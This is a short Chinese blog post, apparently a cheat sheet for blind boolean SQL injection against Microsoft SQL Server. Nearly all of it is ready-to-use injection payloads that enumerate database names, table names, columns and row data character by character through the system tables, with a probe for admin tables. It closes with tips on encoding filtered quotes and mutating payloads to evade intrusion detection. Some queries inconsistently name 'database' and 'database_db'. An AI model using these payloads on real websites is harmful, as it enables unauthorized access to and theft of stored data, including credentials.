MSSQL三个关键系统表:
1.master.dbo.sysdatabases系统表:该表位于master数据库中
关键字段:name:库的名字 dbid:库的id(dbid从1到5是系统库)
2.sysobjects系统表:该表位于每个数据库中
关键字段:name:对象名称 id:对象id uid:所有者对象用户id status:对象状态 xtype:对象类型
xtype="U" //用户表,xtype="X" //扩展存储过程,xtype="S" //系统表
3.syscolumns系统表:该表位于每个数据库中
关键字段:name:字段名称 id:表id号 colid:字段id号
猜数据库名:
先猜dbid:
and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database):
可以尝试先看有没管理表:
and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1
猜第一个,先长度:
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1
猜第一个表名,逐位猜:
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1
猜第二个表名(假设第一个为table1):
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1
猜字段(假设表名已经猜出为table):
猜第一个字段:
and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二个(假设第一个为column1)
and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1
猜数据(假设要猜的字段为name):
and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1
过滤了'记得编码;遇到ids记得变形;猜数据前记得先猜长度!
扫一扫
5501
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
